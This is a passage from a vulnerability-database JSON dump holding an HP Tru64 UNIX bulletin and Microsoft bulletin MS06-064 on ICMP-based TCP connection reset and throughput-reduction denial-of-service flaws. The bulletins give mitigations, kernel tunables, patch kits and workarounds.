&#40;DoS&#41;", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2004-0791", "CVE-2004-0790", "CVE-2004-1060"], "modified": "2005-12-08T00:00:00", "id": "SECURITYVULNS:DOC:10568", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:10568", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:13", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nHP SECURITY BULLETIN\r\n\r\nHPSBTU01210 REVISION: 0\r\n\r\nSSRT4743, SSRT4884 rev.0 - HP Tru64 UNIX TCP/IP remote Denial of\r\n Service &#40;DoS&#41;\r\n\r\nNOTICE:\r\nThere are no restrictions for distribution of this Security\r\nBulletin provided that it remains complete and intact.\r\n\r\nThe information in this Security Bulletin should be acted upon\r\nas soon as possible.\r\n\r\nINITIAL RELEASE:\r\n15 July 2005\r\n\r\nPOTENTIAL SECURITY IMPACT:\r\nRemote Denial of Service &#40;DoS&#41;\r\n\r\nSOURCE:\r\nHewlett-Packard Company\r\nHP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY:\r\nSeveral potential security vulnerabilities have been identified\r\nin the HP Tru64 UNIX TCP/IP including ICMP, and Initial Sequence\r\nNumber generation &#40;ISNs&#41;. These exploits could result in a remote\r\nDenial of Service &#40;DoS&#41; from network throughput reduction for\r\nTCP connections, the reset of TCP connections, or TCP spoofing.\r\n\r\nREFERENCES:\r\nCERT CA-2001-09, NISCC Vulnerability Advisory VU#498440 VU#532967,\r\nCAN-2004-0790 CAN-2004-0791 CAN-2004-1060 CAN-2001-0328\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Tru64 UNIX 5.1B-3\r\nHP Tru64 UNIX 5.1B-2/PK4\r\nHP Tru64 UNIX 5.1A PK\r\nHP Tru64 UNIX 4.0G PK4\r\nHP Tru64 UNIX 4.0F PK8\r\n\r\nBACKGROUND:\r\n\r\nSpecial Instructions for the Customer\r\n\r\nThe Internet Control Message Protocol &#40;ICMP&#41; &#40;RFC 792&#41; is used in\r\nthe Internet Architecture to perform fault-isolation and recovery\r\n&#40;RFC816&#41;, which is the group of actions that hosts and routers\r\ntake to determine if a network failure has occurred.\r\n\r\nThe industry standard TCP specification &#40;RFC 793&#41; has a\r\nvulnerability whereby ICMP packets can be used to perform a\r\nvariety of attacks such as blind connection reset attacks and\r\nblind throughput-reduction attacks. Blind connection reset\r\nattacks can be triggered by an attacker sending forged ICMP\r\n&quot;Destination Unreachable, host unreachable&quot; packets or ICMP\r\n&quot;Destination Unreachable, port unreachable&quot; packets. Blind\r\nthroughput-reduction attacks can be caused by an attacker sending\r\na forged ICMP type 4 &#40;Source Quench&#41; packet.\r\n\r\nPath MTU Discovery &#40;RFC 1191&#41; describes a technique for\r\ndynamically discovering the MTU &#40;maximum transmission unit&#41; of an\r\narbitrary internet path. This protocol uses ICMP packets from\r\nthe router to discover the MTU for a TCP connection path. An\r\nattacker can reduce the throughput of a TCP connection by sending\r\nforged ICMP packets &#40;or their IPv6 counterpart&#41; to the\r\ndiscovering host, causing an incorrect Path MTU setting.\r\n\r\nHP has addressed these potential vulnerabilities by providing a\r\nnew kernel tunable in Tru64 UNIX V5.1B and 5.1A,\r\nicmp_tcpseqcheck. In Tru64 4.0F and 4.0G, HP has introduced two\r\nnew kernel tunables, icmp_tcpseqcheck and icmp_rejectcodemask.\r\nThe icmp_rejectcodemask tunable is already available in Tru64\r\nUNIX V5.1B and 5.1A.\r\n\r\nicmp_tcpseqcheck\r\n\r\nThe icmp_tcpseqcheck variable mitigates ICMP attacks against TCP\r\nby checking that the TCP sequence number contained in the payload\r\nof the ICMP error message is within the range of the data already\r\nsent but not yet acknowledged. An ICMP error message that does\r\nnot pass this check is discarded. This behavior protects TCP\r\nagainst spoofed ICMP packets.\r\n\r\nSet the tunable as follows:\r\n\r\n icmp_tcpseqcheck=1 &#40;default&#41;\r\n\r\n Provides a level of protection that reduces the possibility\r\n of considering a spoofed ICMP packet as valid\r\n to one in two raised to the thirty-second power.\r\n\r\n icmp_tcpseqcheck=0\r\n\r\n Retains existing behavior, i.e., accepts all ICMP packets\r\n\r\nicmp_rejectcodemask\r\n\r\nIn the Requirements for IP Version 4 Routers &#40;RFC 1812&#41;, research\r\nsuggests that the use of ICMP Source Quench packets is an\r\nineffective &#40;and unfair&#41; antidote for congestion. Thus, HP\r\nrecommends completely ignoring ICMP Source Quench packets using\r\nthe icmp_rejectcodemask tunable. The icmp_rejectcodemask is a\r\nbitmask that designates the ICMP codes that the system should\r\nreject. For example, to reject ICMP Source Quench packets,\r\nset the mask bit position for the ICMP_SOURCEQUENCH code 4,\r\nwhich is two to the 4th power = 16 &#40;0x10 hex&#41;.\r\nThe icmp_rejectcodemask tunable can be used to reject any\r\nICMP packet type, or multiple masks can be combined to reject\r\nmore than one type.\r\n\r\nNote: the ICMP type codes are defined in\r\n &quot;/usr/include/netinet/ip_icmp.h&quot;.\r\n\r\n Set the tunable as follows:\r\n\r\n icmp_rejectcodemask = 0x10\r\n\r\n Rejects ICMP Source Quench packets\r\n\r\n icmp_rejectcodemask = 0 &#40;default&#41;\r\n\r\n Retains existing behavior, i.e., accepts all ICMP packets\r\n\r\nAdjusting the variables\r\n\r\nThe ICMP sequence check variable &#40;icmp_tcpseqcheck&#41; can be\r\nadjusted using the sysconfig and sysconfigdb commands:\r\n\r\n# sysconfig -q inet icmp_tcpseqcheck\r\ninet:\r\nicmp_tcpseqcheck = 1\r\n# sysconfig -r inet icmp_tcpseqcheck=0\r\nicmp_tcpseqcheck: reconfigured\r\n# sysconfig -q inet icmp_tcpseqcheck\r\ninet:\r\nicmp_tcpseqcheck = 0\r\n# sysconfig -q inet icmp_tcpseqcheck &gt; /tmp/icmp_tcpseqcheck_merge\r\n# sysconfigdb -m -f /tmp/icmp_tcpseqcheck_merge inet\r\n# sysconfigdb -l inet\r\n\r\ninet:\r\n icmp_tcpseqcheck = 1\r\n\r\nSimilarly, the icmp_rejectcodemask variable can be adjusted using\r\nthe sysconfig and sysconfigdb commands:\r\n\r\n# sysconfig -q inet icmp_rejectcodemask\r\ninet:\r\nicmp_rejectcodemask = 0\r\n# sysconfig -r inet icmp_rejectcodemask=0x10\r\nicmp_rejectcodemask: reconfigured\r\n# sysconfig -q inet icmp_rejectcodemask\r\ninet:\r\nicmp_rejectcodemask = 16\r\n# sysconfig -q inet icmp_rejectcodemask\r\n &gt; /tmp/icmp_rejectcodemask_merge\r\n# sysconfigdb -m -f /tmp/icmp_rejectcodemask_merge inet\r\n# sysconfigdb -l inet\r\n\r\ninet:\r\n icmp_rejectcodemask = 16\r\n\r\nRESOLUTION:\r\n\r\nUntil the corrections are available in a mainstream\r\nrelease patch kit, HP is releasing the following Early Release\r\nPatch &#40;ERP&#41; kits publicly for use by any customer.\r\n\r\nThe ERP kits use dupatch to install and will not install over\r\nany installed Customer Specific Patches &#40;CSPs&#41; that have file\r\nintersections with the ERPs. Contact your service provider for\r\nassistance if the ERP installation is blocked by any of your\r\ninstalled CSPs.\r\n\r\nThe fixes contained in the ERP kits are scheduled to be\r\navailable in the following mainstream patch kits:\r\n\r\n HP Tru64 Unix 5.1B-4\r\n\r\nEarly Release Patches\r\n\r\nThe ERPs deliver the following file:\r\n\r\n/sys/BINARY/inet.mod\r\n\r\nHP Tru64 UNIX 5.1B-3 ERP Kit Name:\r\n T64KIT0025925-V51BB26-ES-20050628\r\nKit Location:\r\n http://www.itrc.hp.com/service/patch/patchDetail.do?\r\n patchid=T64KIT0025925-V51BB26-ES-20050628\r\nMD5 checksum: 129251787a426320af16cd584b982027\r\n\r\nHP Tru64 UNIX 5.1B-2/PK4 ERP Kit Name:\r\n T64KIT0025924-V51BB25-ES-20050628\r\nKit Location:\r\n http://www.itrc.hp.com/service/patch/patchDetail.do?\r\n patchid=T64KIT0025924-V51BB25-ES-20050628\r\nMD5 checksum: 5fcc77a6876db6d10ef07ac96e11b3af\r\n\r\nHP Tru64 UNIX 5.1A PK6 ERP Kit Name:\r\n T64KIT0025922-V51AB24-ES-20050628\r\nKit Location:\r\n http://www.itrc.hp.com/service/patch/patchDetail.do?\r\n patchid=T64KIT0025922-V51AB24-ES-20050628\r\nMD5 checksum: 7c373b35c95945651a1cfda96bf71421\r\n\r\nHP Tru64 UNIX 4.0G PK4 ERP Kit Name:\r\n T64KIT0025920-V40GB22-ES-20050628\r\nKit Location:\r\n http://www.itrc.hp.com/service/patch/patchDetail.do?\r\n patchid=T64KIT0025920-V40GB22-ES-20050628\r\nMD5 checksum: 13849fd555239d75d300d1cb46dc995f\r\n\r\nHP Tru64 UNIX 4.0F PK8 ERP Kit Name:\r\n DUXKIT0025921-V40FB22-ES-20050628\r\nKit Location:\r\n http://www.itrc.hp.com/service/patch/patchDetail.do?\r\n patchid=T64KIT0025920-V40GB22-ES-20050628\r\nMD5 checksum: 743b614d39f185802701b7f2dd14ffa5\r\n\r\nMD5 checksums are available from the ITRC patch database main\r\npage:\r\n http://www.itrc.hp.com/service/patch/mainPage.do\r\n- From the patch database main page, click Tru64 UNIX,\r\nthen click verifying MD5 checksums under useful links.\r\n\r\nGeneral ITRC Patch Page:\r\nhttp://www.itrc.hp.com/service/patch/mainPage\r\n\r\n\r\n\r\nSUPPORT: For further information, contact normal HP Services\r\nsupport channel.\r\n\r\nREPORT: To report a potential security vulnerability with any HP\r\nsupported product, send Email to: security-alert@hp.com. It is\r\nstrongly recommended that security related information being\r\ncommunicated to HP be encrypted using PGP, especially exploit\r\ninformation. To obtain the security-alert PGP key please send an\r\ne-mail message to security-alert@hp.com with the Subject of\r\n&#39;get key&#39; &#40;no quotes&#41;.\r\n\r\nSUBSCRIBE: To initiate a subscription to receive future HP\r\nSecurity Bulletins via Email:\r\n\r\nhttp://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&amp;\r\nlangcode=USENG&amp;jumpid=in_SC-GEN__driverITRC&amp;topiccode=ITRC\r\n\r\nOn the web page: ITRC security bulletins and patch sign-up\r\nUnder Step1: your IRTC security bulletins and patches\r\n - check ALL categories for which alerts are required and\r\n continue.\r\nUnder Step2: your IRTC operating systems\r\n - verify your operating system selections are checked and\r\n save.\r\n\r\nTo update an existing subscription:\r\nhttp://h30046.www3.hp.com/subSignIn.php\r\n\r\nLog in on the web page\r\n Subscriber&#39;s choice for Business: sign-in.\r\nOn the Web page:\r\n Subscriber&#39;s Choice: your profile summary\r\n - use Edit Profile to update appropriate sections.\r\n\r\nTo review previously published Security Bulletins visit:\r\nhttp://itrc.hp.com/service/cki/secBullArchive.do\r\n\r\n* The Software Product Category that this Security Bulletin\r\n relates to is represented by the 5th and 6th characters of the\r\n Bulletin number:\r\n GN = HP General SW,\r\n MA = HP Management Agents,\r\n MI = Misc. 3rd party SW,\r\n MP = HP MPE/iX,\r\n NS = HP NonStop Servers,\r\n OV = HP OpenVMS,\r\n PI = HP Printing &amp; Imaging,\r\n ST = HP Storage SW,\r\n TL = HP Trusted Linux,\r\n TU = HP Tru64 UNIX,\r\n UX = HP-UX,\r\n VV = HP Virtual Vault\r\n\r\nSystem management and security procedures must be reviewed\r\nfrequently to maintain system integrity. HP is continually\r\nreviewing and enhancing the security features of software products\r\nto provide customers with current secure solutions.\r\n\r\n&quot;HP is broadly distributing this Security Bulletin in order to\r\nbring to the attention of users of the affected HP products the\r\nimportant security information contained in this Bulletin. HP\r\nrecommends that all users determine the applicability of this\r\ninformation to their individual situations and take appropriate\r\naction. HP does not warrant that this information is necessarily\r\naccurate or complete for all user situations and, consequently, HP\r\nwill not be responsible for any damages resulting from user&#39;s use\r\nor disregard of the information provided in this Bulletin. To the\r\nextent permitted by law, HP disclaims all warranties, either\r\nexpress or implied, including the warranties of merchantability\r\nand fitness for a particular purpose, title and non-infringement.&quot;\r\n\r\n\r\n&#40;c&#41;Copyright 2005 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or\r\neditorial errors or omissions contained herein. The information\r\nprovided is provided &quot;as is&quot; without warranty of any kind. To the\r\nextent permitted by law, neither HP nor its affiliates,\r\nsubcontractors or suppliers will be liable for incidental, special\r\nor consequential damages including downtime cost; lost profits;\r\ndamages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration.\r\nThe information in this document is subject to change without\r\nnotice. Hewlett-Packard Company and the names of Hewlett-Packard\r\nproducts referenced herein are trademarks of Hewlett-Packard\r\nCompany in the United States and other countries. Other product\r\nand company names mentioned herein may be trademarks of their\r\nrespective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: PGP 8.1\r\n\r\niQA/AwUBQtuSLuAfOvwtKn1ZEQJXrwCgpDVfLyXvXZd3sF6bswgQ3DLz5jcAoNt2\r\nAs7Gf9BY697IdlYjIlmrirG1\r\n=143G\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "cvss3": {}, "published": "2005-07-19T00:00:00", "title": "HPSBTU01210 SSRT4743, SSRT4884 rev.0 - HP Tru64 UNIX TCP/IP remote Denial of Service &#40;DoS&#41;", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2004-0791", "CVE-2004-0790", "CVE-2004-1060", "CVE-2001-0328"], "modified": "2005-07-19T00:00:00", "id": "SECURITYVULNS:DOC:9226", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:9226", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:19", "description": "Microsoft Security Bulletin MS06-064\r\nVulnerabilities in TCP/IP IPv6 Could Allow Denial of Service &#40;922819&#41;\r\nPublished: October 10, 2006\r\n\r\nVersion: 1.0\r\nSummary\r\n\r\nWho Should Read this Document: Customers who use Microsoft Windows.\r\n\r\nImpact of Vulnerability: Denial of Service\r\n\r\nMaximum Severity Rating: Low\r\n\r\nRecommendation: Customers should evaluate whether to apply the security update to the affected systems.\r\n\r\nSecurity Update Replacement: None\r\n\r\nTested Software and Security Update Download Locations:\r\n\r\nAffected Software:\r\n\u2022\t\r\n\r\nMicrosoft Windows XP Service Pack 1 and Microsoft Windows XP Service Pack 2 \u2014 Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows XP Professional x64 Edition \u2014 Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1 \u2014 Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows Server 2003 for Itanium-based Systems and Microsoft Windows Server 2003 with SP1 for Itanium-based Systems \u2014 Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows Server 2003 x64 Edition \u2014 Download the update\r\n\r\nNon-Affected Software:\r\n\u2022\t\r\n\r\nMicrosoft Windows 2000 Service Pack 4\r\n\r\nThe software in this list has been tested to determine whether the versions are affected. Other versions either no longer include security update support or may not be affected. To determine the support life cycle for your product and version, visit the Microsoft Support Lifecycle Web site.\r\n\r\nNote The security updates for Microsoft Windows Server 2003, Windows Server 2003 Service Pack 1, and Windows Server 2003 x64 Edition also apply to Windows Server 2003 R2.\r\nTop of sectionTop of section\r\nGeneral Information\r\n\t\r\nExecutive Summary\r\n\r\nExecutive Summary:\r\n\r\nThis update resolves a publicly disclosed vulnerability as well as additional issues discovered through internal investigations.\r\n\r\nAn attacker who successfully exploited the most severe of these vulnerabilities against an affected system could cause the system to stop responding or automatically reboot.\r\n\r\nWe recommend that customers evaluate whether to apply the security update to the affected systems.\r\n\r\nSeverity Ratings and Vulnerability Identifiers:\r\nVulnerability Identifiers\tImpact of Vulnerability\tWindows XP Service Pack 1\tWindows XP Service Pack 2\tWindows Server 2003\tWindows Server 2003 Service Pack 1\r\n\r\nICMP Connection Reset Vulnerability - CVE-2004-0790\r\n\t\r\n\r\nDenial of Service\r\n\t\r\n\r\nLow\r\n\t\r\n\r\nLow\r\n\t\r\n\r\nLow\r\n\t\r\n\r\nLow\r\n\r\nTCP Connection Reset Vulnerability - CVE-2004-0230\r\n\t\r\n\r\nDenial of Service\r\n\t\r\n\r\nLow\r\n\t\r\n\r\nLow\r\n\t\r\n\r\nLow\r\n\t\r\n\r\nLow\r\n\r\nSpoofed Connection Request Vulnerability - CVE-2005-0688\r\n\t\r\n\r\nDenial of Service\r\n\t\r\n\r\nLow\r\n\t\r\n\r\nLow\r\n\t\r\n\r\nLow\r\n\t\r\n\r\nLow\r\n\r\nAggregate Severity of All Vulnerabilities\r\n\t\r\n\r\n \r\n\t\r\n\r\nLow\r\n\t\r\n\r\nLow\r\n\t\r\n\r\nLow\r\n\t\r\n\r\nLow\r\n\r\nThis assessment is based on the types of systems that are affected by the vulnerability, their typical deployment patterns, and the effect that exploiting the vulnerability would have on them.\r\n\r\nNote The security updates for Windows Server 2003, Windows Server 2003 Service Pack 1, and Windows Server 2003 x64 Edition also apply to Windows Server 2003 R2.\r\n\r\nNote The severity ratings for non-x86 operating system versions map to the x86 operating systems versions as follows:\r\n\u2022\t\r\n\r\nThe Windows XP Professional x64 Edition severity rating is the same as the Windows Server 2003 Service Pack 1.\r\n\u2022\t\r\n\r\nThe Windows Server 2003 for Itanium-based Systems severity rating is the same as the Windows Server 2003 severity rating.\r\n\u2022\t\r\n\r\nThe Windows Server 2003 with SP1 for Itanium-based Systems severity rating is the same as the Windows Server 2003 Service Pack 1 severity rating.\r\n\u2022\t\r\n\r\nThe Windows Server 2003 x64 Edition severity rating is the same as the Windows Server 2003 Service Pack 1 severity rating.\r\nTop of sectionTop of section\r\n\t\r\nFrequently Asked Questions &#40;FAQ&#41; Related to This Security Update\r\n\r\nWhy does this update address several reported security vulnerabilities?\r\nThis update contains support for several vulnerabilities because the modifications that are required to address these issues are located in related files. Instead of having to install several updates that are almost the same, customers can install only this update.\r\n\r\nDoes this security update contain any non-security changes to functionality?\r\nYes. In addition to the changes that are listed in the &quot;Vulnerability Details&quot; section, this update includes the Teredo Interoperability update for Windows XP Service Pack 2. Windows Server 2003 does not support Teredo and is not receiving the Teredo functionality change.\r\n\r\nWhat is the Teredo interoperability update?\r\nIANA has allocated a new Teredo prefix 2001:0/32 for Teredo. In order to establish connectivity over Teredo between Windows XP Service Pack 2 IPv6 capable hosts and Windows Vista, the Teredo prefix is being revised on all Windows XP machines. To learn more about Teredo please visit the following Microsoft TechNet documentation. To learn more about the new Teredo prefix, please visit the following RFC documentation.\r\n\r\nDoes this security update make any changes to the IPv4 implementation of TCP/IP?\r\nNo. The security issues addressed by this bulletin have already been resolved in the corresponding IPv4 implementation of TCP/IP with the release of the MS05-019.\r\n\r\nExtended security update support for Microsoft Windows 98, Windows 98 Second Edition, or Windows Millennium Edition ended on July 11, 2006. I am still using one of these operating systems; what should I do?\r\nWindows 98, Windows 98 Second Edition, and Windows Millennium Edition have reached the end of their support life cycles. It should be a priority for customers who have these operating system versions to migrate to supported versions to prevent potential exposure to vulnerabilities. For more information about the Windows Product Lifecycle, visit the following Microsoft Support Lifecycle Web site. For more information about the extended security update support period for these operating system versions, visit the Microsoft Product Support Services Web site.\r\n\r\nExtended security update support for Microsoft Windows NT Workstation 4.0 Service Pack 6a and Windows 2000 Service Pack 2 ended on June 30, 2004. Extended security update support for Microsoft Windows NT Server 4.0 Service Pack 6a ended on December 31, 2004. Extended security update support for Microsoft Windows 2000 Service Pack 3 ended on June 30, 2005. I am still using one of these operating systems; what should I do?\r\nWindows NT Workstation 4.0 Service Pack 6a, Windows NT Server 4.0 Service Pack 6a, Windows 2000 Service Pack 2, and Windows 2000 Service Pack 3 have reached the end of their support life cycles. It should be a priority for customers who have these operating system versions to migrate to supported versions to prevent potential exposure to vulnerabilities. For more information about the Windows Product Lifecycle, visit the following Microsoft Support Lifecycle Web site. For more information about the extended security update support period for these operating system versions, visit the Microsoft Product Support Services Web site.\r\n\r\nCustomers who require custom support for these products must contact their Microsoft account team representative, their Technical Account Manager, or the appropriate Microsoft partner representative for custom support options. Customers without an Alliance, Premier, or Authorized Contract can contact their local Microsoft sales office. For contact information, visit the Microsoft Worldwide Information Web site, select the country, and then click Go to see a list of telephone numbers. When you call, ask to speak with the local Premier Support sales manager. For more information, see the Windows Operating System Product Support Lifecycle FAQ.\r\n\r\nCan I use the Microsoft Baseline Security Analyzer &#40;MBSA&#41; to determine whether this update is required?\r\nThe following table provides the MBSA detection summary for this security update.\r\nProduct\tMBSA 1.2.1\tMBSA 2.0\r\n\r\nMicrosoft Windows XP Service Pack 1 and Microsoft Windows XP Service Pack 2\r\n\t\r\n\r\nYes\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows XP Professional x64 Edition\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1\r\n\t\r\n\r\nYes\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows Server 2003 for Itanium-based Systems and Microsoft Windows Server 2003 with Service Pack 1 for Itanium-based Systems\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows Server 2003 x64 Edition family\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nYes\r\n\r\nFor more information about MBSA, visit the MBSA Web site. For more information about the programs that Microsoft Update and MBSA 2.0 currently do not detect, see Microsoft Knowledge Base Article 895660.\r\n\r\nFor more detailed information, see Microsoft Knowledge Base Article 910723.\r\n\r\nCan I use Systems Management Server &#40;SMS&#41; to determine whether this update is required?\r\nThe following table provides the SMS detection summary for this security update.\r\nProduct\tSMS 2.0\tSMS 2003\r\n\r\nMicrosoft Windows XP Service Pack 1 and Microsoft Windows XP Service Pack 2\r\n\t\r\n\r\nYes\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows XP Professional x64 Edition\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1\r\n\t\r\n\r\nYes\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows Server 2003 for Itanium-based Systems and Microsoft Windows Server 2003 with Service Pack 1 for Itanium-based Systems\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows Server 2003 x64 Edition family\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nYes\r\n\r\nSMS 2.0 and SMS 2003 Software Update Services &#40;SUS&#41; Feature Pack can use MBSA 1.2.1 for detection and therefore have the same limitation that is listed earlier in this bulletin related to programs that MBSA 1.2.1 does not detect.\r\n\r\nFor more information about SMS, visit the SMS Web site.\r\n\r\nFor more detailed information, see Microsoft Knowledge Base Article 910723.\r\nTop of sectionTop of section\r\n\t\r\nVulnerability Details\r\n\t\r\nICMP Connection Reset Vulnerability - CVE-2004-0790:\r\n\r\nA denial of service vulnerability exists in the IPv6 Windows implementation of the Internet Control Message Protocol &#40;ICMP&#41;. An attacker who successfully exploited this vulnerability could cause the affected system to drop an existing TCP connection.\r\n\t\r\nMitigating Factors for ICMP Connection Reset Vulnerability - CVE-2004-0790:\r\n\u2022\t\r\n\r\nFirewall best practices and firewall or router configurations that block all ICMP traffic can help protect networks from attacks that originate outside the enterprise perimeter. Best practices recommend that systems that are connected to the Internet have a minimal number of ports exposed.\r\n\u2022\t\r\n\r\nIPv6 support is not installed by default on Windows XP Service Pack 1, Windows XP Service Pack 2, Windows Server 2003 and Windows Server 2003 Service Pack 1.\r\n\u2022\t\r\n\r\nAn attacker\u2019s system must belong to the same IPv6 network as the target system.\r\n\u2022\t\r\n\r\nAn attacker must first predict or discover the IP address and port information of the source and of the destination of an existing TCP network connection.\r\n\u2022\t\r\n\r\nThis attack would have to be performed on each TCP connection that was targeted for reset. Many applications will automatically restore connections that have been reset.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for ICMP Connection Reset Vulnerability - CVE-2004-0790:\r\n\r\nMicrosoft has tested the following workarounds. While these workarounds will not correct the underlying vulnerability, they help block known attack vectors. When a workaround reduces functionality, it is identified in the following section.\r\n\u2022\t\r\n\r\nUninstall IPv6.\r\n\r\nFor the IPv6 protocol for Windows XP with SP2, Windows XP with SP1, or Windows Server 2003, do the following:\r\n\r\n1.\r\n\t\r\n\r\nLog on to the computer with a user account that has privileges to change network configuration.\r\n\r\n2.\r\n\t\r\n\r\nClick Start, click Control Panel, and then double-click Network Connections.\r\n\r\n3.\r\n\t\r\n\r\nClick Microsoft TCP/IP version 6 &#40;for Windows XP with SP2 or Windows Server 2003&#41; or Microsoft IPv6 Developer Edition &#40;for Windows XP with SP1&#41;, and then click Uninstall.\r\n\r\n4.\r\n\t\r\n\r\nWhen prompted to confirm the removal of the Microsoft IPv6 Developer Edition or Microsoft TCP/IP version 6 protocol, click OK.\r\n\r\nAlternately, from the Windows XP or Windows Server 2003 desktop do the following:\r\n\r\n1.\r\n\t\r\n\r\nClick Start, point to Programs, point to Accessories.\r\n\r\n2.\r\n\t\r\n\r\nClick Command Prompt.\r\n\r\n3.\r\n\t\r\n\r\nAt the command prompt, type netsh interface ipv6 uninstall.\r\n\r\nImpact of Workaround: Uninstalling IPv6 would result in the system not being able to communicate with other hosts on an IPv6 configured network.\r\n\u2022\t\r\n\r\nBlock all ICMP network packets at the firewall or at the router:\r\n\r\nICMP network packets are used to initiate a connection with the affected components. Blocking them at the firewall or at the router will help protect systems that are behind that firewall or router from attempts to exploit this vulnerability. We recommend that you block all unsolicited inbound communication from the Internet.\r\n\r\nImpact of Workaround: This workaround can also negatively impact performance by preventing TCP from optimizing network communication. ICMP network packets can eliminate fragmentation at routers connecting networks with different MTUs. Fragmentation reduces TCP throughput and increases network congestion.\r\n\r\nNote: Windows XP Service Pack 1 Firewall is unable to handle IPv6 network traffic. In order to ensure protection for your Windows XP Service Pack 1 system using the Internet Connection Firewall you should apply the update identified in KB Article 817778 \u201cOverview of the Advanced Networking Pack for Windows XP\u201d.\r\n\u2022\t\r\n\r\nBlock ICMP traffic by using IPSec on the affected systems.\r\n\r\nUse Internet Protocol security &#40;IPSec&#41; to help protect network communications. Detailed information about IPSec and about how to apply filters is available in Microsoft Knowledge Base Article 313190 and Microsoft Knowledge Base Article 813878.\r\n\r\nImpact of Workaround: This workaround can also negatively impact performance by preventing TCP from optimizing network communication. ICMP network packets can eliminate fragmentation at routers connecting networks with different MTUs. Fragmentation reduces TCP throughput and increases network congestion.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for ICMP Connection Reset Vulnerability - CVE-2004-0790:\r\n\r\nWhat is the scope of the vulnerability?\r\n\r\nA denial of service vulnerability exists in Windows in the IPv6 implementation of the Internet Control Message Protocol &#40;ICMP&#41;. An attacker who successfully exploited this vulnerability could cause the affected system to drop an existing TCP connection.\r\n\r\nWhat causes the vulnerability?\r\nSpecially crafted ICMP packets are being parsed when they should be dropped which may cause the reset of an existing connection.\r\n\r\nWhat is IPv6?\r\nInternet Protocol version 6 &#40;IPv6&#41;, a new suite of standard protocols for the network layer of the Internet, is built into Microsoft Windows XP and later. IPv6 is designed to solve many of the problems of the current version of IP &#40;known as IPv4&#41; such as address depletion, security, autoconfiguration, and extensibility. To learn more about IPv6, please read the following Microsoft FAQ for IPv6.\r\n\r\nWhat is TCP/IP?\r\nTCP/IP is a set of networking protocols. TCP/IP includes standards for how computers communicate and conventions for connecting networks and for routing traffic. For more information about TCP/IP, see the following Microsoft Web site.\r\n\r\nWhat is ICMP?\r\nInternet Control Message Protocol &#40;ICMP&#41; is a required TCP/IP standard. &quot;Internet Control Message Protocol &#40;ICMP&#41;.&quot; Hosts and routers that use IP communication can report errors and exchange limited control and status information using ICMP.\r\n\r\nICMP messages are usually sent automatically in one of the following situations:\r\n\u2022\t\r\n\r\nAn IP datagram cannot reach its destination.\r\n\u2022\t\r\n\r\nAn IP router &#40;gateway&#41; cannot forward datagrams at the current rate of transmission.\r\n\u2022\t\r\n\r\nAn IP router redirects the sending host to a better route to the destination.\r\n\r\nYou can use the ping command to send ICMP echo request messages and to record the receipt of ICMP echo reply messages. By using these messages, you can detect network or host communication failures and troubleshoot common TCP/IP connectivity problems. For more information about ICMP, see the following Microsoft Web site.\r\n\r\nWhat might an attacker use the vulnerability to do?\r\nAn attacker who exploited this vulnerability could cause the affected system to reset TCP connections.\r\n\r\nWho could exploit the vulnerability?\r\nAny anonymous user who could deliver a specially crafted message to the affected system could try to exploit this vulnerability. An attacker\u2019s system must belong to the same IPv6 network as a target system.\r\n\r\nHow could an attacker exploit the vulnerability?\r\nAn attacker could exploit the vulnerability by creating a specially crafted message and sending the message to an affected system. The message could then cause the affected system to reset TCP network connections.\r\n\r\nWhat systems are primarily at risk from the vulnerability?\r\nAll affected operating systems are at risk from this vulnerability. However, servers are at primary risk from this vulnerability because they maintain connections with clients that could be vulnerable to the connection reset.\r\n\r\nCould the vulnerability be exploited over the Internet?\r\nYes. An attacker could try to exploit this vulnerability over the Internet. By default, the Microsoft Internet Connection Firewall &#40;ICF&#41; in Windows XP Service Pack 1 and in Windows Server 2003 allows these kinds of network packets and cannot be used to filter them by default. The firewall component in Windows XP Service Pack 2 and Windows Server 2003 Service Pack 1 called Windows Firewall is able to block this traffic. If you are running IPv6 on a Windows XP Service Pack 1 you should apply update identified in KB Article 817778 \u201cOverview of the Advanced Networking Pack for Windows XP\u201d to get an updated Internet Connection Firewall which is able to handle IPv6 traffic.\r\n\r\nWhat does the update do?\r\nThe update removes the vulnerability by modifying the way that the affected operating systems validate ICMP requests.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed?\r\nYes. This vulnerability has been publicly disclosed as affecting the 